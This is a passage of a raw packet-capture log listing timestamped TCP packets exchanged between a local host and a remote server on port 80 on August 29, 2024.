                                                      Aug 29, 2024 22:52:27.915460110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915469885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915482998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915491104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.915498018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915507078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.915530920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.916379929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916388988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916412115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916421890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916429996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.916430950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916449070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916450024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.916466951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.916471004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.916488886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.916512012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997062922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997075081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997083902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997104883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997116089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997124910 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997133017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997136116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997150898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997159958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997169018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997178078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997179985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997189045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997193098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997215986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997229099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997370005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997380018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997387886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997399092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997409105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997412920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997423887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997427940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997435093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997445107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.997452021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997474909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.997487068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002110004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002152920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002157927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002165079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002190113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002190113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002197981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002207994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002216101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002226114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002238035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002244949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002274990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002312899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002322912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002331972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002341986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002350092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002351046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002357960 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002361059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002383947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002386093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002393007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002397060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002407074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002414942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002418041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002429008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002433062 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002441883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002461910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002461910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002473116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002482891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002490997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002490997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002502918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002510071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002513885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002515078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002536058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002556086 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002650976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002661943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002671003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002681971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002693892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002701998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002701998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002707958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002718925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002720118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002727985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002737045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002743959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002747059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002752066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002758026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002768993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002770901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002779961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002789974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002801895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002801895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002820015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002832890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002832890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002841949 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002849102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002859116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002863884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002867937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002873898 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002882004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002888918 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002902985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002907038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002913952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002914906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002923965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002933979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002939939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002947092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002947092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002959013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002966881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002969027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002978086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002986908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.002988100 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.002998114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003005981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003006935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003021955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003030062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003040075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003047943 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003050089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003062963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003072977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003082991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003087044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003087044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003094912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003098965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003109932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003120899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003134012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003140926 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003150940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003160954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003163099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003171921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003181934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003210068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003210068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003210068 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003221035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003232002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003252029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003261089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003259897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003261089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003269911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003282070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003284931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003290892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003293991 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003304005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003312111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003314972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003325939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003330946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003338099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003346920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003353119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003356934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003369093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003376961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003379107 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003384113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003407955 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003427982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003528118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003537893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003546000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003563881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003570080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003573895 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003582001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003590107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003595114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003607988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003607988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.003617048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003633022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.003648043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.083848000 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083858967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083875895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083890915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083899975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083908081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.083909988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083924055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083933115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083935022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.083950043 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.083964109 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083972931 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.083976030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083992004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.083993912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084007978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084017992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084017992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084028959 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084029913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084036112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084042072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084050894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084064007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084076881 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084148884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084157944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084166050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084176064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084184885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084187031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084197044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084206104 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084216118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084216118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.084225893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084238052 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.084260941 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088443995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088490009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088660955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088670969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088679075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088696957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088706970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088707924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088718891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088726044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088730097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088742018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088747025 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088790894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088814020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088829994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088840961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088855982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088869095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088875055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088881969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088891983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088900089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088906050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088908911 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088921070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088931084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088929892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088943005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088953018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088956118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088963032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088963985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088973999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.088992119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.088999033 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.242443085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.247333050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428190947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428225040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428236961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428246975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428258896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428270102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428294897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428332090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428349972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428359985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428369999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428386927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428390980 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428400040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428406954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428412914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428442001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428455114 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428601027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428637981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428644896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428657055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428690910 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428735018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428745985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428755999 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428769112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428782940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428797007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428862095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428873062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428883076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428921938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428935051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428945065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428951979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428976059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.428983927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428983927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.428987980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.429004908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.429013014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.429028988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.429050922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.429485083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.429497957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.429507017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:28.429531097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:28.429533005 CEST8049739147.45.68.138192.168.2.4
